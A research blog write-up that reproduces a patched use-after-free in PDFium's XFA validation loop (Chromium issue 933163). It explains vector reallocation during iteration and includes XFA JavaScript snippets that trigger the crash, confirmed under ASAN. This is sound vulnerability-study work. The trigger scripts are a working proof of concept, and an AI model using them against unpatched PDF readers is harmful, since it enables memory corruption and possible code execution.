Reproduction of PDFium Issue #933163

Use-after-Free vulnerability on CXFA_FFDocView::RunValidate()

Introduction

I have always wanted to learn how to exploit Chromium's V8 engine and its related components. The interest originally came from CTFs, quite a few of which had pwn challenges built around V8 exploitation. So when my internship supervisor suggested reproducing a now-patched security vulnerability as a way to learn PDFium, Chromium's open-source PDF reader, which is based heavily on Foxit Reader, I jumped straight on the idea.

This is the story of tracking down the source of the bug and attempting to exploit it.

Link to bug: https://bugs.chromium.org/p/chromium/issues/detail?id=933163

First Steps

Since both of us were new to C++ as well as to the PDF format and PDF parsing, we had to take a crash course in some elements of C++ and figure out how PDFs are handled by a PDF viewer, which made this an interesting ride.

In this bug, there is a Use-after-Free vulnerability in the RunValidate() function of the CXFA_FFDocView class. Let's take a look at the vulnerable (pre-patch) function.

bool CXFA_FFDocView::RunValidate() {

  if (!m_pDoc->GetDocEnvironment()->IsValidationsEnabled(m_pDoc.Get()))
    return false;

  for (CXFA_Node* node : m_ValidateNodes) {
    if (!node->HasRemovedChildren())
      node->ProcessValidate(this, 0);
  }

  m_ValidateNodes.clear();
  return true;
}

We can break down the function as follows:

  1. RunValidate() is called when validation is requested (this can be inferred by finding the places where RunValidate() is called).
  2. If validation is not enabled, RunValidate() returns false and does not run any validation script.
  3. The for loop iterates through m_ValidateNodes (with an iterator) and runs ProcessValidate() on every node that does not have removed children.
  4. m_ValidateNodes.clear() removes all elements of m_ValidateNodes so that it is ready for the next round of validation.

So, we know that the bug is a UaF, which means that there has to be something in here that somehow frees memory while another object is still trying to access it. Because IsValidationsEnabled() shouldn't affect any read/write data, the problem has to lie within the for loop. The iterator seems to be the only possible source of the problem for a UaF vulnerability.

If we take a look at the patch, we can see that the problem was fixed by calling the move constructor on m_ValidateNodes before iterating through it. Bingo, the problem does lie with the iterator. But just how does it work? This was where our lack of C++ knowledge initially gated us from reaching a definitive answer, but once we got to know how vectors were defined, it got a lot easier.

In the simplest terms, a vector created without an initial capacity starts with capacity 0 and grows geometrically as elements are pushed into it, typically 1, 2, 4… and so on, doubling whenever a push would exceed the current capacity (the exact growth factor depends on the standard library implementation). To grow, it allocates a new, larger block (for example 2n elements), copies or moves the existing elements into it, and then deallocates the old block. Any pointer, reference, or iterator into the old block is invalid from that point on. Now that we understood how vectors manage their storage, we could go back to working out what exactly was causing the UaF.
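To make the growth behaviour concrete, here is a minimal sketch that pushes elements into a std::vector and records every reallocation. The names Growth and ObserveGrowth are made up for this illustration, and the exact capacities you see depend on your standard library, so treat the numbers as an observation rather than a guarantee.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// One record per reallocation observed while pushing elements.
// (Hypothetical helper type, not part of PDFium.)
struct Growth {
  std::size_t size_after_push;  // number of elements after the push
  std::size_t new_capacity;     // capacity after the reallocation
  bool storage_moved;           // did data() change address?
};

// Pushes `count` ints into an empty vector and logs every capacity change.
std::vector<Growth> ObserveGrowth(std::size_t count) {
  std::vector<int> v;
  std::vector<Growth> log;
  for (std::size_t i = 0; i < count; ++i) {
    const std::size_t old_capacity = v.capacity();
    // Keep the old address as an integer so a dangling pointer is never used.
    const auto old_addr = reinterpret_cast<std::uintptr_t>(v.data());
    v.push_back(static_cast<int>(i));
    if (v.capacity() != old_capacity) {
      const auto new_addr = reinterpret_cast<std::uintptr_t>(v.data());
      log.push_back({v.size(), v.capacity(), new_addr != old_addr});
    }
  }
  return log;
}
```

Calling ObserveGrowth(100) and printing new_capacity for each entry shows the growth sequence used by your toolchain. Every entry should also report storage_moved as true, which is the property the bug depends on.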

Finding the Vuln Function

First, without digging through the code, I just wanted to check whether ProcessValidate() could push into m_ValidateNodes. I assumed it did, since:

  1. In the patched code there is a comment after the for loop, "// May have created more nodes to validate, try again", which signifies that nodes could have been added to m_ValidateNodes during ProcessValidate().
  2. There is nothing else in the for loop that could have created more nodes to validate, since HasRemovedChildren() only returns a boolean and does not affect m_ValidateNodes.
  3. ProcessValidate() takes the argument CXFA_FFDocView* docView, which means it has access to the docView in question and could potentially change its member variables.

We then theorized the following scenario: suppose the vector m_ValidateNodes has reached the capacity of its backing store, and ProcessValidate() adds a new node to m_ValidateNodes.

Then C++ would have to, as mentioned above, do something like this (pseudocode)

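// Pseudocode: what push_back() does once the vector is full
newstore = malloc(newcapacity * sizeof(element))
for (int i = 0; i < m_ValidateNodes.length; i++) {
  newstore[i] = m_ValidateNodes.backingstore[i]  // copy into the new block
}
free(m_ValidateNodes.backingstore)  // anything still pointing here now dangles
m_ValidateNodes.backingstore = newstore
m_ValidateNodes.capacity = newcapacity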

in order to increase its backing store. Growing geometrically like this is how a vector achieves amortized O(1) time for push_back(). It also means that the memory backing m_ValidateNodes has now moved to a different address.

ProcessValidate() is called inside the range-based for loop, for (CXFA_Node* node : m_ValidateNodes), which walks m_ValidateNodes through an iterator into the vector's backing store. If m_ValidateNodes has to grow during that call, its elements are moved to a new allocation and the old one is freed, but the loop's iterator still points into the old, freed block. When the loop advances, it reads the next CXFA_Node* out of that freed memory and treats it as a valid node, so the following HasRemovedChildren() or ProcessValidate() call works on a garbage pointer, which is what causes the SIGSEGV.

This leads to UaF and thus potential RCE.
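The fix mentioned earlier, move-constructing a local vector from m_ValidateNodes before iterating, can be sketched with toy types. This is not the actual PDFium patch: ToyNode, ToyDocView, and the on_validate callback are stand-ins invented for this example, and the only details taken from the patch are the move into a local and the "try again" behaviour described by its comment.

```cpp
#include <cassert>
#include <functional>
#include <utility>
#include <vector>

// Toy stand-ins; these are NOT the real PDFium classes.
struct ToyDocView;

struct ToyNode {
  int id = 0;
  // Stand-in for a validate script: it may queue more nodes on the view.
  std::function<void(ToyDocView&)> on_validate;
};

struct ToyDocView {
  std::vector<ToyNode*> validate_nodes;  // plays the role of m_ValidateNodes
  std::vector<int> validated_ids;        // order in which nodes were validated

  void RunValidate() {
    // Keep going until no callback has queued further work.
    while (!validate_nodes.empty()) {
      // Take ownership of the current batch. Callbacks now push into the
      // member vector, never into the vector being iterated.
      std::vector<ToyNode*> batch = std::move(validate_nodes);
      validate_nodes.clear();  // moved-from state is unspecified; make it empty
      for (ToyNode* node : batch) {
        validated_ids.push_back(node->id);
        if (node->on_validate)
          node->on_validate(*this);
      }
    }
  }
};
```

With two queued nodes where the first one's callback queues a third, the loop validates all three in order and never iterates over storage that a callback can reallocate. A callback that always queues more work would loop forever in this sketch, so a real implementation would need its own policy for that.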

Confirming the Vulnerability

So far the theory rests on an assumption. The assumption is well justified, since there is almost no other way for m_ValidateNodes to have been changed, but we still needed to confirm that ProcessValidate() really does add nodes before moving forward. Like the rest of Chromium, PDFium has wrappers upon wrappers, so we had to unravel the function.

ProcessValidate() is a member of the CXFA_Node class, and a quick look at CXFA_Node.h confirms that there is a declaration of ProcessValidate() that accepts a parameter CXFA_FFDocView* docView, which is the object we want to look at. ProcessValidate() calls many functions, so to narrow things down we only looked for uses of docView, and there were only 2 instances of this:

bool bStatus = docView->GetLayoutStatus() < XFA_DOCVIEW_LAYOUTSTATUS_End;

and

if (script) {
  CXFA_EventParam eParam;
  eParam.m_eType = XFA_EVENT_Validate;
  eParam.m_pTarget = this;
  std::tie(iRet, bRet) = ExecuteBoolScript(docView, script, &eParam);
}

We know GetLayoutStatus() could not have added or removed nodes, as it only returns a status value that is compared against XFA_DOCVIEW_LAYOUTSTATUS_End. So the answer had to lie within ExecuteBoolScript(docView, script, &eParam). Looking at ExecuteBoolScript(), we found that it runs the validation script attached to the node and returns a Boolean indicating whether the node is valid. Since that script is JavaScript supplied by the document, it can change the values of other fields, which is how new nodes can end up in m_ValidateNodes in the middle of RunValidate().

Attempting an Exploit

This is where the fun part comes in: with just this knowledge, it was already more or less possible to build an exploit. Because the header file shows that m_ValidateNodes is not given a starting capacity, we first assumed the usual vector capacity growth: 0, 1, 2, 4, 8, 16…

<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_0.combox");
    var val=xfa.resolveNode("my_doc.combox_0.combox");
    val.rawValue="1";
    xfa.host.setFocus("my_doc.combox_1.combox");
    xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>

This puts 1 node into m_ValidateNodes at the start, and calling openList will call RunValidate(), with the following validate script on combox_0:

<validate>
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_1.combox");
    var val=xfa.resolveNode("my_doc.combox_1.combox");
    val.rawValue="1";
    xfa.host.setFocus("my_doc.combox_0.combox");
  </script>
</validate>

What we want is to change a value and add it to m_ValidateNodes while validating a node so that m_ValidateNodes would have exceeded its current capacity and would thus need to increase its backing store mid-validation.

However, running this did not produce any error.

Hmm, what could be the problem? We had assumed that the backing store would grow as 0, 1, 2, 4…, but apparently going from 1 to 2 elements was not enough to trigger the bug. One plausible reason is that with a single queued node the loop ends right after the reallocation: a range-based for loop captures its end iterator up front, so once the only element has been processed the stale iterator already equals the old end and freed memory is never read. If we instead start with 2 objects in the vector and add a third, the capacity surely has to grow from 2 to 4, and there is still a second element left to iterate over.

We add a third combo box, combox_2, with the exact same format as combox_1, and also modify the value of combox_1 in the docReady event so that m_ValidateNodes holds 2 objects before RunValidate() is executed:

<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_0.combox");
    var val=xfa.resolveNode("my_doc.combox_0.combox");
    val.rawValue="1";
    xfa.host.setFocus("my_doc.combox_1.combox");
    var val1=xfa.resolveNode("my_doc.combox_1.combox");
    val1.rawValue="1";
    xfa.host.setFocus("my_doc.combox_2.combox");
    xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>

We also modify the validate script of combox_0 so that it changes the value of combox_2 instead of combox_1. This adds a third node to m_ValidateNodes, whose backing store should theoretically have a capacity of 2.

This time when we ran the pdf through pdfium, we got a SIGSEGV. This is one big step towards success, but we're not completely in the clear yet.
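One way to reason about why one queued node was not enough while two were is to model the loop with indices instead of real iterators. The sketch below is only a model under stated assumptions: SimulateFirstIterationPush and LoopOutcome are names invented here, the "nodes" are plain ints, and it assumes reserve(n) yields a capacity of exactly n, which holds on the common standard libraries but is not guaranteed by the standard.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct LoopOutcome {
  bool reallocated;  // did the push during the first iteration move the storage?
  bool stale_read;   // would the loop read another element from the old storage?
};

// Models `for (node : nodes)` where the first iteration pushes one extra node.
// Uses indices and integer addresses only, so nothing dangling is dereferenced.
LoopOutcome SimulateFirstIterationPush(std::size_t initial_nodes) {
  std::vector<int> nodes;
  nodes.reserve(initial_nodes);  // assumption: capacity becomes initial_nodes
  for (std::size_t i = 0; i < initial_nodes; ++i)
    nodes.push_back(static_cast<int>(i));

  // A range-based for captures begin() and end() once, before iterating.
  const std::size_t cached_end = nodes.size();
  const auto old_addr = reinterpret_cast<std::uintptr_t>(nodes.data());

  nodes.push_back(-1);  // what the validate script causes while node 0 runs

  const bool reallocated =
      reinterpret_cast<std::uintptr_t>(nodes.data()) != old_addr;
  // After node 0, the loop advances to index 1 and stops at the cached end.
  const bool more_iterations = cached_end > 1;
  return {reallocated, reallocated && more_iterations};
}
```

Under those assumptions, SimulateFirstIterationPush(1) reallocates but reports no stale read, because the loop has nothing left to visit, while SimulateFirstIterationPush(2) reports a stale read for the second element. That matches the behaviour we saw with one and two pre-queued combo boxes.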

We can see that the SIGSEGV occurs in the function HasFlag(), which is a good sign since this function is called inside ProcessValidate(), which is called within the exploitable for loop. We then loaded the PDF using pdfium with ASAN enabled, and ASAN confirmed the use-after-free.

Great, we have now reproduced the UaF vulnerability. As a double-check, we loaded the exploit PDF provided in the bug report both in gdb and on the command line with ASAN enabled.

The SIGSEGV occurred at the same place, with HasFlag() having the same arg this=0x100010001.

The address that the UaF occurred on seemed to be different in both PDFs, but that shouldn't matter because different PDF layouts were used in both PDFs.

This is a graph roughly explaining the logic flow when parsing the exploit pdf:

Thus, we have achieved UaF with the bug in issue #933163.

Afterword

We still don't completely understand the inner workings of pdfium because we did not go through the code base thoroughly, and we did do a bit of calculated guessing to land the reproduction of the exploit. There are still many functions in the CXFA_FFDocView and CXFA_Node classes for which we don't know exactly when they are called, but we believe we generally understand the cause of this bug and how to trigger it.

Thanks for reading.
